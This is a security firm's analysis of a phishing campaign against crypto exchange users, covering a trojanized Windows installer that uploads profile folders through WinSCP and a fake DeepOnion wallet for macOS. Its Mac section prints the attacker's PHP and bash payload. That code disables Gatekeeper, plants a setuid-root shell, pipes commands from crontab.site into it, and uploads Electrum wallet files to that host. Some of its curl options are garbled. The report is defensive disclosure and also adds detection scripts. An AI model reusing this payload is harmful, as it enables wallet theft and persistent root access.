By: 愛上平頂山@SlowMist Security Team
Introduction
Recently the SlowMist security team received intelligence that a professional cybercrime group is running a large-scale, bulk email phishing campaign against exchange users.
The phishing email (screenshot):
On receiving the report, the SlowMist security team began analysis immediately.
The detailed analysis follows:
Attack details
Clicking the link takes us to the target page:
As the screenshot shows, download links are offered for Mac OS X / macOS / Windows; each link points to the location where the attacker's trojanized files are hosted.
The hosting account was created 3 days earlier and contains two repositories:
b*****.github.io
b****t
The sample “Bi****-Setup.exe” in the screenshot is the Windows malicious file.
“index.html” is a fake upgrade-prompt page that lures the user into downloading the "upgrade".
Detailed analysis
Next we analyze the Windows and Mac payloads separately.
1. Windows
The digital signature of the sample “Bi****-Setup.exe”:
(1) Basic EXE information
File name: B****-KYC-Setup.exe
Embedded files (name / MD5 / type):
script.txt / 877da6cdd4eb284e2d8887b24a24168c / Unknown
setup.exe / fe1818a5e8aed139a8ccf9f60312bb30 / EXE
WinSCP.exe / e71c39688fad97b66af3e297a04c3663 / EXE
(2) Key behavior
Behavior: suppresses the window-close message
Details: hWnd = 0x00030336, Text = Deep Onion Setup: Completed, ClassName = #32770
Note the window title "Deep Onion Setup: Completed": the installer was built under the DeepOnion name, the same lure used on the Mac side (see below).
(3) Process behavior
Behavior: creates local threads
Details:
TargetProcess: %temp%\****.exe, InheritedFromPID = 2000, ProcessID = 2888, ThreadID = 2948, StartAddress = 00405209, Parameter = 0001034A
TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3140, ThreadID = 3188, StartAddress = 008B9F7C, Parameter = 00000000
TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3140, ThreadID = 3192, StartAddress = 00819BF4, Parameter = 0272E170
TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3164, ThreadID = 3196, StartAddress = 008B9F7C, Parameter = 00000000
TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3164, ThreadID = 3200, StartAddress = 00819BF4, Parameter = 0272E270
TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3172, ThreadID = 3232, StartAddress = 008B9F7C, Parameter = 00000000
TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3120, ThreadID = 3236, StartAddress = 008B9F7C, Parameter = 00000000
TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3172, ThreadID = 3240, StartAddress = 00819BF4, Parameter = 0272E170
TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3120, ThreadID = 3244, StartAddress = 00819BF4, Parameter = 0272E170
TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3180, ThreadID = 3248, StartAddress = 008B9F7C, Parameter = 00000000
TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3180, ThreadID = 3252, StartAddress = 00819BF4, Parameter = 0272E170
TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3140, ThreadID = 3264, StartAddress = 009B8C28, Parameter = 026F4B90
TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3164, ThreadID = 3280, StartAddress = 009B8C28, Parameter = 026F4C90
TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3172, ThreadID = 3284, StartAddress = 009B8C28, Parameter = 026F4B90
TargetProcess: WinSCP.exe, InheritedFromPID = 2888, ProcessID = 3120, ThreadID = 3352, StartAddress = 009B8C28, Parameter = 026F4B90
(4) Behavior: creates new file processes
Details:
[0x00000c30] ImagePath = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\.nsis_files\WinSCP.exe, CmdLine = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\.nsis_files\WinSCP.exe" /ini=null /script="script.txt" /log="winscp_documents.log" /loglevel=0 /parameter "C:\Documents and Settings\Administrator\My Documents" "09-06-2020-4:51:51_documents"
[0x00000c44] ImagePath = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\.nsis_files\WinSCP.exe, CmdLine = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\.nsis_files\WinSCP.exe" /ini=null /script="script.txt" /log="winscp_appdata.log" /loglevel=0 /parameter "C:\Documents and Settings\Administrator\Application Data" "09-06-2020-4:51:51_appdata"
[0x00000c5c] ImagePath = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\.nsis_files\WinSCP.exe, CmdLine = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\.nsis_files\WinSCP.exe" /ini=null /script="script.txt" /log="winscp_localappdata.log" /loglevel=0 /parameter "C:\Documents and Settings\Administrator\Local Settings\Application Data" "09-06-2020-4:51:51_localappdata"
[0x00000c64] ImagePath = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\.nsis_files\WinSCP.exe, CmdLine = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\.nsis_files\WinSCP.exe" /ini=null /script="script.txt" /log="winscp_onedrive.log" /loglevel=0 /parameter "C:\Documents and Settings\Administrator\OneDrive" "09-06-2020-4:51:51_onedrive"
[0x00000c6c] ImagePath = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\.nsis_files\WinSCP.exe, CmdLine = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\.nsis_files\WinSCP.exe" /ini=null /script="script.txt" /log="winscp_pictures.log" /loglevel=0 /parameter "C:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\WinSCP.exe" /ini=null /script="script.txt" /log="winscp_pictures.log" /loglevel=0 /parameter "C:\Documents and Settings\Administrator\Pictures" "09-06-2020-4:51:51_pictures"
The NSIS installer drops a legitimate WinSCP binary into %temp%\.nsis_files and launches it five times (PIDs 0xc30, 0xc44, 0xc5c, 0xc64, 0xc6c), each run driven non-interactively by the same script.txt. The directory to upload and a timestamped label are passed through /parameter: My Documents, Application Data, Local Settings\Application Data, OneDrive and Pictures. /loglevel=0 keeps WinSCP's own log quiet, and /ini=null makes WinSCP read and write a configuration file literally named "null" next to the binary, which is why a file .nsis_files\null appears in the file-creation and overwrite lists below.
(5) File behavior
Behavior: creates files
Details:
C:\Documents and Settings\Administrator\Local Settings\Temp\nsi9.tmp
C:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\WinSCP.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\script.txt
C:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\setup.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\nsyA.tmp
C:\Documents and Settings\Administrator\Local Settings\Temp\nsyA.tmp\System.dll
C:\Documents and Settings\Administrator\Application Data\winscp.rnd
C:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\winscp_appdata.log
C:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\winscp_onedrive.log
C:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\winscp_localappdata.log
C:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\winscp_documents.log
C:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\winscp_pictures.log
C:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\null
(6) Behavior: creates executable files
Details:
C:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\setup.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\nsyA.tmp\System.dll
(7) Behavior: overwrites existing files
Details:
C:\Documents and Settings\Administrator\Application Data\winscp.rnd
C:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\null
(8) Behavior: queries files
Details:
FileName = C:\Documents and Settings
FileName = C:\Documents and Settings\Administrator
FileName = C:\Documents and Settings\Administrator\Local Settings
FileName = C:\Documents and Settings\Administrator\Local Settings\Temp
FileName = C:\Documents and Settings\Administrator\Local Settings\%temp%
FileName = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\nsyA.tmp
FileName = C:\DOCUME~1
FileName = C:\DOCUME~1\ADMINI~1
FileName = C:\DOCUME~1\ADMINI~1\LOCALS~1
FileName = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp
FileName = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\.nsis_files\WinSCP.exe
FileName = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\.nsis_files\WinSCP.zh-CN
FileName = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\.nsis_files\WinSCP.zh-Hans
FileName = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\.nsis_files\WinSCP.zh
FileName = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\.nsis_files\WinSCP.CHS
(9) Behavior: deletes files
Details:
C:\Documents and Settings\Administrator\Local Settings\Temp\nsi9.tmp
C:\Documents and Settings\Administrator\Local Settings\Temp\nsyA.tmp
(10) Behavior: modifies file contents
Details:
C:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\WinSCP.exe ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\WinSCP.exe ---> Offset = 32768
C:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\WinSCP.exe ---> Offset = 33203
C:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\WinSCP.exe ---> Offset = 65971
C:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\WinSCP.exe ---> Offset = 66905
C:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\script.txt ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\setup.exe ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\setup.exe ---> Offset = 24146
C:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\setup.exe ---> Offset = 44980
C:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\setup.exe ---> Offset = 60884
C:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\setup.exe ---> Offset = 93652
C:\Documents and Settings\Administrator\Local Settings\Temp\nsyA.tmp\System.dll ---> Offset = 0
C:\Documents and Settings\Administrator\Application Data\winscp.rnd ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\winscp_appdata.log ---> Offset = 0
C:\Documents and Settings\Administrator\Local Settings\Temp\.nsis_files\winscp_appdata.log ---> Offset = 102
(11) Network behavior
Behavior: establishes a connection to a specified socket
Details:
IP: **.138.40.**:128, SOCKET = 0x000001d0
IP: **.138.40.**:128, SOCKET = 0x000001cc
We ran the installer ourselves; it self-extracts:
Inside the extracted content we found the FTP account and password used to upload the victim's local data, together with a genuine Electrum installer. Once the victim installs and uses it, sensitive information entered into Electrum is sent to the attacker's remote FTP server.
Users have been falling victim since 2 June 2020.
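As an added example (written for this edit, not part of the original report or the attacker's tooling), the Python below parses WinSCP process-creation command lines like those recorded in section (4) and flags the dropper's pattern: WinSCP run non-interactively (/script=) from a Temp directory with a user-profile directory handed to the script through /parameter. The five sample command lines are copied from the sandbox report above; the two benign controls, the function names and the profile-directory list are my own assumptions.

```python
import re

# Sample process-creation command lines copied from the sandbox report above
# (8.3 short paths exactly as the sandbox recorded them).
SAMPLE_CMDLINES = [
    r'"C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\.nsis_files\WinSCP.exe" /ini=null /script="script.txt" /log="winscp_documents.log" /loglevel=0 /parameter "C:\Documents and Settings\Administrator\My Documents" "09-06-2020-4:51:51_documents"',
    r'"C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\.nsis_files\WinSCP.exe" /ini=null /script="script.txt" /log="winscp_appdata.log" /loglevel=0 /parameter "C:\Documents and Settings\Administrator\Application Data" "09-06-2020-4:51:51_appdata"',
    r'"C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\.nsis_files\WinSCP.exe" /ini=null /script="script.txt" /log="winscp_localappdata.log" /loglevel=0 /parameter "C:\Documents and Settings\Administrator\Local Settings\Application Data" "09-06-2020-4:51:51_localappdata"',
    r'"C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\.nsis_files\WinSCP.exe" /ini=null /script="script.txt" /log="winscp_onedrive.log" /loglevel=0 /parameter "C:\Documents and Settings\Administrator\OneDrive" "09-06-2020-4:51:51_onedrive"',
    r'"C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\.nsis_files\WinSCP.exe" /ini=null /script="script.txt" /log="winscp_pictures.log" /loglevel=0 /parameter "C:\Documents and Settings\Administrator\Pictures" "09-06-2020-4:51:51_pictures"',
]

# Constructed benign controls (not from the report): an interactive launch and an
# administrator's own scripted export from the normal install location.
BENIGN_CMDLINES = [
    r'"C:\Program Files (x86)\WinSCP\WinSCP.exe"',
    r'"C:\Program Files (x86)\WinSCP\WinSCP.exe" /script="C:\backup\nightly.txt" /parameter "D:\exports"',
]

# Last path component of directories that hold user data (assumed list; extend as needed).
USER_PROFILE_DIRS = {"my documents", "documents", "desktop", "application data", "onedrive", "pictures"}

TOKEN = re.compile(r'"[^"]*"|\S+')


def tokenize(cmdline):
    """Split a Windows command line on whitespace while honouring double quotes."""
    toks = []
    for t in TOKEN.findall(cmdline):
        if len(t) >= 2 and t.startswith('"') and t.endswith('"'):
            t = t[1:-1]
        toks.append(t)
    return toks


def parse_winscp_cmdline(cmdline):
    """Return the image path, the /switch=value pairs and the arguments after /parameter."""
    toks = tokenize(cmdline)
    info = {"image": toks[0], "switches": {}, "parameters": []}
    i = 1
    while i < len(toks):
        t = toks[i]
        if t.lower() == "/parameter":          # everything after it is input for the script
            info["parameters"] = toks[i + 1:]
            break
        if t.startswith("/"):
            key, _, value = t[1:].partition("=")
            info["switches"][key.lower()] = value.strip('"')
        i += 1
    return info


def basename_win(path):
    return path.rstrip("\\").rsplit("\\", 1)[-1].lower()


def is_scripted_exfil(cmdline):
    """Return a finding dict for the dropper pattern, or None for anything else."""
    info = parse_winscp_cmdline(cmdline)
    image = info["image"].lower()
    if not image.endswith("winscp.exe"):
        return None
    from_temp = "\\temp\\" in image
    scripted = "script" in info["switches"]
    profile_hits = [p for p in info["parameters"] if basename_win(p) in USER_PROFILE_DIRS]
    reasons = []
    if from_temp:
        reasons.append("WinSCP launched from a Temp directory")
    if scripted:
        reasons.append("non-interactive run via /script=" + info["switches"]["script"])
    if info["switches"].get("ini") == "null":
        reasons.append("/ini=null: WinSCP creates a config file literally named 'null' beside the binary")
    if profile_hits:
        reasons.append("user profile directory passed as /parameter: " + profile_hits[0])
    # A scripted run by itself is normal admin usage; require it together with
    # at least one dropper trait (Temp location or a profile directory as input).
    if scripted and (from_temp or profile_hits):
        return {"image": info["image"],
                "source_dir": profile_hits[0] if profile_hits else None,
                "reasons": reasons}
    return None


def scan_process_creates(cmdlines):
    """Run the check over a batch of command lines and keep only the hits."""
    return [f for f in (is_scripted_exfil(c) for c in cmdlines) if f]


if __name__ == "__main__":
    for hit in scan_process_creates(SAMPLE_CMDLINES + BENIGN_CMDLINES):
        print(hit["source_dir"], "<-", "; ".join(hit["reasons"]))
```

The same parser can be pointed at Sysmon Event ID 1 or EDR process-creation telemetry; the useful signal is the combination, since WinSCP's /script switch is also how legitimate backup jobs run.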
2. Mac
(1) Install command:
(2) Script content:
(3) Malicious address: https://github.com/deep-onion
(This imitates https://github.com/deeponion, the GitHub address of the well-known project https://deeponion.org/.)
The malicious account likewise holds two repositories:
deep-onion.github.io
wallet
https://github.com/deep-onion/deep-onion.github.io
This file is not analyzed here.
(4) Mac payload
https://github.com/deep-onion/wallet
The malicious file is DeepOnion.
Running the malicious script triggers a chain of malicious actions: it disables Gatekeeper (spctl --master-disable), copies the system ksh into the home directory as .ksh and makes it a root-owned, world-writable setuid binary, writes a .strtp startup script that waits 300 seconds and then pipes whatever http://crontab.site returns into that setuid shell, uploads every file under ~/.electrum/wallets to crontab.site, and finally uploads its own log. For example:

```php
try {
    shell_exec("spctl --master-disable");
    $ksh = trim(shell_exec("which ksh"));
    shell_exec("cp $ksh $homedir/.ksh");
    shell_exec("cd $homedir && chown root:wheel .ksh && chmod a+rwxs .ksh");
    shell_exec("cd $homedir && echo '#!/bin/bash' > .strtp && echo 'sleep 300' >> .strtp && echo 'curl http://crontab.site/?log=startup\&key=startup\&id=$id | $homedir/.ksh' >> .strtp && chown root:wheel .strtp && chmod a+x .strtp");
    try {
        $dir = "$homedir/.electrum/wallets";
        if (file_exists($dir)) {
            $files = scandir($dir);
            foreach ($files as $file) {
                // curl option garbled in the extracted text ("-->"); kept as captured
                shell_exec("curl -s -->$dir/$file\" http://crontab.site/?log=startup\&key=$file\&id=$id");
            }
        }
    } catch (Exception $e) {
        shell_exec('echo "Caught exception: ' . $e->getMessage() . '"' . " >> $log");
    }
    shell_exec("curl -s -->$log\" http://crontab.site/?log=startup\&key=log\&id=$id");
    // remainder of the outer try/catch was not captured
```

```bash
whoami >> /tmp/cron.log
ls -al /Users/ >> /tmp/cron.log
ls -al $HOMEDIR >> /tmp/cron.log
curl -->"@/tmp/cron.log" http://crontab.site/?log=startup\&key=cron.log\&id=$UID
```

Overall flow
Through the sequence of operations above, the attacker steals the user's private information. Two points deserve emphasis: the chown root:wheel and chmod a+rwxs calls only succeed if the script is already running as root, so the install command must have obtained elevated privileges; and once a world-writable setuid-root ksh sits in the home directory, the .strtp line that pipes curl output into it hands the C2 server root-level code execution on every run, long after the wallet files have been taken.
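As an added example (written for this edit, not part of the original report or the attacker's tooling), the Python audit below looks for the artifacts that script leaves behind on a Mac: a setuid/setgid copy of a shell inside a user's home directory, a startup script that pipes curl output into a shell, references to the C2 domain crontab.site, and the spctl --master-disable command. The function names, the severity labels and the constructed demo home directory are my own; the demo .strtp content mirrors what the script above writes.

```python
import os
import re
import stat
import subprocess
import sys
import tempfile

# Indicators taken from the script above.
C2_DOMAINS = ("crontab.site",)
GATEKEEPER_OFF = "spctl --master-disable"
# curl output piped into any shell, including a private copy such as ~/.ksh
CURL_PIPE_SHELL = re.compile(r"\bcurl\b[^|\n]*\|\s*\S*(?:ksh|bash|zsh|sh)\b")


def classify_mode(path, st_mode, st_uid):
    """Flag setuid/setgid regular files; a root-owned one in a home directory is the backdoor."""
    findings = []
    if stat.S_ISREG(st_mode) and st_mode & (stat.S_ISUID | stat.S_ISGID):
        owner = "root-owned " if st_uid == 0 else ""
        severity = "high" if st_uid == 0 else "medium"
        findings.append((severity, path, f"{owner}setuid/setgid file in home directory"))
    return findings


def scan_script_text(path, text):
    """Content checks for startup scripts and anything else small enough to read."""
    findings = []
    for domain in C2_DOMAINS:
        if domain in text:
            findings.append(("high", path, f"references C2 domain {domain}"))
    if CURL_PIPE_SHELL.search(text):
        findings.append(("high", path, "pipes curl output into a shell"))
    if GATEKEEPER_OFF in text:
        findings.append(("high", path, "disables Gatekeeper"))
    return findings


def audit_home(home, max_text_bytes=65536):
    """Walk a home directory and return (severity, path, reason) tuples."""
    findings = []
    for dirpath, _dirs, filenames in os.walk(home):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # do not follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            findings += classify_mode(path, st.st_mode, st.st_uid)
            if st.st_size <= max_text_bytes:
                try:
                    with open(path, "rb") as fh:
                        text = fh.read().decode("utf-8", "replace")
                except OSError:
                    continue
                findings += scan_script_text(path, text)
    return findings


def demo_audit():
    """Build a constructed home directory with the script's artifacts and audit it."""
    with tempfile.TemporaryDirectory() as home:
        # .strtp as the script writes it (constructed sample; $homedir and $id filled in)
        strtp = "#!/bin/bash\nsleep 300\n" \
                "curl http://crontab.site/?log=startup\\&key=startup\\&id=abc123 | /Users/victim/.ksh\n"
        with open(os.path.join(home, ".strtp"), "w") as fh:
            fh.write(strtp)
        ksh = os.path.join(home, ".ksh")
        with open(ksh, "wb") as fh:
            fh.write(b"\x7fELF stub, stands in for the copied ksh binary\n")
        try:
            os.chmod(ksh, 0o4755)             # setuid bit; chown to root needs privileges we do not use
        except OSError:
            pass
        return audit_home(home)


if __name__ == "__main__":
    if sys.platform == "darwin":
        # Gatekeeper state on the live host; prints "assessments disabled" after --master-disable
        print(subprocess.run(["spctl", "--status"], capture_output=True, text=True).stdout.strip())
    target = sys.argv[1] if len(sys.argv) > 1 else os.path.expanduser("~")
    for severity, path, reason in audit_home(target):
        print(f"[{severity}] {path}: {reason}")
```

Run it against a real home directory with `python3 audit.py /Users/<name>`; the one indicator that is unambiguous on its own is a root-owned setuid file under a user's home, which no legitimate macOS software places there.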
Notes:
C2 information:
crontab.site
WHOIS phone: +7.9453949549
Registered: 2020-04-20 17:47:03
Expires: 2021-04-20 23:59:59
Updated: 2020-04-20 17:47:04
SlowMist recommendations
For this incident the SlowMist security team recommends:
Know the official email domain of your exchange.
Treat links and attachments in emails from unknown senders with caution.
Be suspicious of any email that cites an "upgrade", "account anomaly" or similar reason.
For a suspicious email that still has to be acted on, consult a security professional promptly.
You are welcome to contact the SlowMist security team at any time: [email protected]